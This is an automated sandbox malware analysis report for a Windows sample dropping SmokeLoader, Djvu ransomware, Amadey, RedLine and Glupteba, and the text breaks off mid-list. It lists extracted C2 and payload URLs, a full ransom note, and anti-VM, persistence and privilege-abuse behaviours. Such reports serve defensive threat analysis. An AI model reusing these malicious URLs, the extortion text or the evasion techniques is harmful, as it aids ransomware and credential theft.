Analysis
-
max time kernel
154s -
max time network
164s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
15-10-2023 14:53
Static task
static1
Behavioral task
behavioral1
Sample
NEAS.914f1d5465e5201dc2a565458ac9744aae002a6c7ec55a77384b0b8aac97da40exe_JC.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
NEAS.914f1d5465e5201dc2a565458ac9744aae002a6c7ec55a77384b0b8aac97da40exe_JC.exe
Resource
win10v2004-20230915-en
General
-
Target
NEAS.914f1d5465e5201dc2a565458ac9744aae002a6c7ec55a77384b0b8aac97da40exe_JC.exe
-
Size
240KB
-
MD5
b4b15aef4d2769d9e337702ce7aa7567
-
SHA1
e86f505fb4ccbd77cabdc6287b3a4fe0de1b526c
-
SHA256
914f1d5465e5201dc2a565458ac9744aae002a6c7ec55a77384b0b8aac97da40
-
SHA512
30bd7de40cad2620b5883bcbc8c7b7b06787271b941c759ad3581b4b4b83c267bff074a93a76d39d2c45e0598bd7496d52af63d2e81d2449593a105c4a7ee80d
-
SSDEEP
3072:e8MOh+yFRASFi4K+U8Rh68InevzpZ0zvX5DQh1Dk:etkSSvTnRhWnAzpoVQh
Malware Config
Extracted
smokeloader
2022
http://onualituyrs.org/
http://sumagulituyo.org/
http://snukerukeutit.org/
http://lightseinsteniki.org/
http://liuliuoumumy.org/
http://stualialuyastrelia.net/
http://kumbuyartyty.net/
http://criogetikfenbut.org/
http://tonimiuyaytre.org/
http://tyiuiunuewqy.org/
http://wirtshauspost.at/tmp/
http://msktk.ru/tmp/
http://soetegem.com/tmp/
http://gromograd.ru/tmp/
http://talesofpirates.net/tmp/
Extracted
djvu
http://zexeq.com/raud/get.php
-
extension
.pthh
-
offline_id
43WPLl8Cnh3dZoiWhf8tP8Q9CrMBVUL2dwHB2Rt1
-
payload_url
http://colisumy.com/dl/build2.exe
http://zexeq.com/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-dHFDYXqlkk Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0808ASUDr
Extracted
amadey
3.87
http://79.137.192.18/9bDc8sQ/index.php
-
install_dir
577f58beff
-
install_file
yiueea.exe
-
strings_key
a5085075a537f09dec81cc154ec0af4d
Extracted
redline
LogsDiller Cloud (TG: @logsdillabot)
146.59.161.13:39199
Extracted
smokeloader
pub1
Extracted
smokeloader
up3
Extracted
smokeloader
2020
http://host-file-host6.com/
http://host-host-file8.com/
Signatures
-
Detected Djvu ransomware 10 IoCs
resource yara_rule behavioral2/memory/2156-32-0x0000000004A60000-0x0000000004B7B000-memory.dmp family_djvu behavioral2/memory/2424-43-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/2424-47-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4724-53-0x0000000000800000-0x0000000000900000-memory.dmp family_djvu behavioral2/memory/2424-56-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/2424-63-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/2424-151-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/3360-171-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/3360-177-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/3360-184-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Glupteba payload 5 IoCs
resource yara_rule behavioral2/memory/3544-85-0x0000000005080000-0x000000000596B000-memory.dmp family_glupteba behavioral2/memory/3544-100-0x0000000000400000-0x0000000002FB8000-memory.dmp family_glupteba behavioral2/memory/3544-166-0x0000000000400000-0x0000000002FB8000-memory.dmp family_glupteba behavioral2/memory/3544-209-0x0000000000400000-0x0000000002FB8000-memory.dmp family_glupteba behavioral2/memory/3544-270-0x0000000000400000-0x0000000002FB8000-memory.dmp family_glupteba -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
resource yara_rule behavioral2/memory/3212-42-0x0000000000400000-0x000000000043E000-memory.dmp family_redline behavioral2/memory/5088-264-0x0000000000400000-0x000000000045A000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
description pid Process procid_target PID 3968 created 3224 3968 latestX.exe 44 PID 3968 created 3224 3968 latestX.exe 44 PID 3968 created 3224 3968 latestX.exe 44 PID 3968 created 3224 3968 latestX.exe 44 PID 3968 created 3224 3968 latestX.exe 44 PID 3492 created 3224 3492 mi.exe 44 PID 3492 created 3224 3492 mi.exe 44 PID 3492 created 3224 3492 mi.exe 44 PID 3492 created 3224 3492 mi.exe 44 PID 3492 created 3224 3492 mi.exe 44 PID 3492 created 3224 3492 mi.exe 44 PID 232 created 3224 232 updater.exe 44 PID 4560 created 3224 4560 updater.exe 44 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ mi.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 34A8.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts latestX.exe File created C:\Windows\System32\drivers\etc\hosts mi.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 4412 netsh.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 34A8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion mi.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion mi.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 34A8.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation 4C59.exe Key value queried \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation yiueea.exe Key value queried \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation 2ECB.exe -
Executes dropped EXE 24 IoCs
pid Process 2156 2ECB.exe 3244 34A8.exe 3348 465D.exe 2568 4C59.exe 2424 2ECB.exe 4724 5207.exe 3544 57A6.exe 4372 yiueea.exe 3304 6AB3.exe 3844 2ECB.exe 3624 toolspub2.exe 1728 toolspub2.exe 3360 2ECB.exe 3968 latestX.exe 3588 yiueea.exe 3492 mi.exe 4044 57A6.exe 232 updater.exe 1700 csrss.exe 4560 updater.exe 4456 injector.exe 4760 yiueea.exe 3240 windefender.exe 4828 windefender.exe -
Loads dropped DLL 1 IoCs
pid Process 3364 regsvr32.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 380 icacls.exe -
resource yara_rule behavioral2/files/0x000800000002325d-21.dat themida behavioral2/files/0x000800000002325d-23.dat themida behavioral2/memory/3244-69-0x0000000000E40000-0x00000000015C0000-memory.dmp themida behavioral2/memory/3244-274-0x0000000000E40000-0x00000000015C0000-memory.dmp themida behavioral2/files/0x000800000002328c-347.dat themida behavioral2/files/0x000800000002328c-353.dat themida behavioral2/files/0x000800000002328c-527.dat themida -
resource yara_rule behavioral2/files/0x00090000000232a2-695.dat upx behavioral2/files/0x00090000000232a2-698.dat upx behavioral2/files/0x00090000000232a2-702.dat upx -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe Set value (str) \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\927271cb-a2b6-4a7a-b0d1-87c713c0c5c6\\2ECB.exe\" --AutoStart" 2ECB.exe Set value (str) \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 57A6.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 34A8.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mi.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 72 api.2ip.ua 73 api.2ip.ua -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 8 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3244 34A8.exe 3492 mi.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 3348 set thread context of 3212 3348 465D.exe 98 PID 2156 set thread context of 2424 2156 2ECB.exe 100 PID 3624 set thread context of 1728 3624 toolspub2.exe 127 PID 3844 set thread context of 3360 3844 2ECB.exe 128 PID 3244 set thread context of 5088 3244 34A8.exe 132 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 57A6.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe latestX.exe File created C:\Program Files\Google\Chrome\updater.exe mi.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\rss\csrss.exe 57A6.exe File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\rss 57A6.exe -
Launches sc.exe 11 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2020 sc.exe 2040 sc.exe 3384 sc.exe 5036 sc.exe 2296 sc.exe 4316 sc.exe 872 sc.exe 3536 sc.exe 520 sc.exe 3180 sc.exe 624 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 3968 3348 WerFault.exe 95 4940 3360 WerFault.exe 128 -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 5207.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 5207.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI NEAS.914f1d5465e5201dc2a565458ac9744aae002a6c7ec55a77384b0b8aac97da40exe_JC.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI NEAS.914f1d5465e5201dc2a565458ac9744aae002a6c7ec55a77384b0b8aac97da40exe_JC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI NEAS.914f1d5465e5201dc2a565458ac9744aae002a6c7ec55a77384b0b8aac97da40exe_JC.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 5207.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5052 schtasks.exe 1760 schtasks.exe 5048 schtasks.exe 1968 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" 57A6.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time" 57A6.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" 57A6.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" 57A6.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" 57A6.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" 57A6.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" 57A6.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time" 57A6.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" 57A6.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" 57A6.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time" 57A6.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2892 = "Sudan Standard Time" 57A6.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" 57A6.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" 57A6.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" 57A6.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" 57A6.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" 57A6.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" 57A6.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" 57A6.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time" 57A6.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time" 57A6.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" 57A6.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" 57A6.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time" 57A6.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time" 57A6.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" 57A6.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" 57A6.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" 57A6.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time" 57A6.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5040 NEAS.914f1d5465e5201dc2a565458ac9744aae002a6c7ec55a77384b0b8aac97da40exe_JC.exe 5040 NEAS.914f1d5465e5201dc2a565458ac9744aae002a6c7ec55a77384b0b8aac97da40exe_JC.exe 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3224 Explorer.EXE -
Suspicious behavior: MapViewOfSection 7 IoCs
pid Process 5040 NEAS.914f1d5465e5201dc2a565458ac9744aae002a6c7ec55a77384b0b8aac97da40exe_JC.exe 4724 5207.exe 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 3224 Explorer.EXE 1728 toolspub2.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 3224 Explorer.EXE Token: SeCreatePagefilePrivilege 3224 Explorer.EXE Token: SeShutdownPrivilege 3224 Explorer.EXE Token: SeCreatePagefilePrivilege 3224 Explorer.EXE Token: SeShutdownPrivilege 3224 Explorer.EXE Token: SeCreatePagefilePrivilege 3224 Explorer.EXE Token: SeShutdownPrivilege 3224 Explorer.EXE Token: SeCreatePagefilePrivilege 3224 Explorer.EXE Token: SeShutdownPrivilege 3224 Explorer.EXE Token: SeCreatePagefilePrivilege 3224 Explorer.EXE Token: SeShutdownPrivilege 3224 Explorer.EXE Token: SeCreatePagefilePrivilege 3224 Explorer.EXE Token: SeShutdownPrivilege 3224 Explorer.EXE Token: SeCreatePagefilePrivilege 3224 Explorer.EXE Token: SeShutdownPrivilege 3224 Explorer.EXE Token: SeCreatePagefilePrivilege 3224 Explorer.EXE Token: SeShutdownPrivilege 3224 Explorer.EXE Token: SeCreatePagefilePrivilege 3224 Explorer.EXE Token: SeShutdownPrivilege 3224 Explorer.EXE Token: SeCreatePagefilePrivilege 3224 Explorer.EXE Token: SeShutdownPrivilege 3224 Explorer.EXE Token: SeCreatePagefilePrivilege 3224 Explorer.EXE Token: SeShutdownPrivilege 3224 Explorer.EXE Token: SeCreatePagefilePrivilege 3224 Explorer.EXE Token: SeShutdownPrivilege 3224 Explorer.EXE Token: SeCreatePagefilePrivilege 3224 Explorer.EXE Token: SeShutdownPrivilege 3224 Explorer.EXE Token: SeCreatePagefilePrivilege 3224 Explorer.EXE Token: SeDebugPrivilege 3244 34A8.exe Token: SeShutdownPrivilege 3224 Explorer.EXE Token: SeCreatePagefilePrivilege 3224 Explorer.EXE Token: SeShutdownPrivilege 3224 Explorer.EXE Token: SeCreatePagefilePrivilege 3224 Explorer.EXE Token: SeDebugPrivilege 3212 AppLaunch.exe Token: SeDebugPrivilege 4784 powershell.exe Token: SeDebugPrivilege 5088 AppLaunch.exe Token: SeShutdownPrivilege 3224 Explorer.EXE Token: SeCreatePagefilePrivilege 3224 Explorer.EXE Token: SeDebugPrivilege 904 powershell.exe Token: SeShutdownPrivilege 3224 Explorer.EXE Token: SeCreatePagefilePrivilege 3224 Explorer.EXE Token: SeDebugPrivilege 3544 57A6.exe Token: SeImpersonatePrivilege 3544 57A6.exe Token: SeDebugPrivilege 4852 powershell.exe Token: SeShutdownPrivilege 3784 powercfg.exe Token: SeCreatePagefilePrivilege 3784 powercfg.exe Token: SeShutdownPrivilege 1428 powercfg.exe Token: SeCreatePagefilePrivilege 1428 powercfg.exe Token: SeShutdownPrivilege 2516 powercfg.exe Token: SeCreatePagefilePrivilege 2516 powercfg.exe Token: SeShutdownPrivilege 520 powercfg.exe Token: SeCreatePagefilePrivilege 520 powercfg.exe Token: SeIncreaseQuotaPrivilege 4852 powershell.exe Token: SeSecurityPrivilege 4852 powershell.exe Token: SeTakeOwnershipPrivilege 4852 powershell.exe Token: SeLoadDriverPrivilege 4852 powershell.exe Token: SeSystemProfilePrivilege 4852 powershell.exe Token: SeSystemtimePrivilege 4852 powershell.exe Token: SeProfSingleProcessPrivilege 4852 powershell.exe Token: SeIncBasePriorityPrivilege 4852 powershell.exe Token: 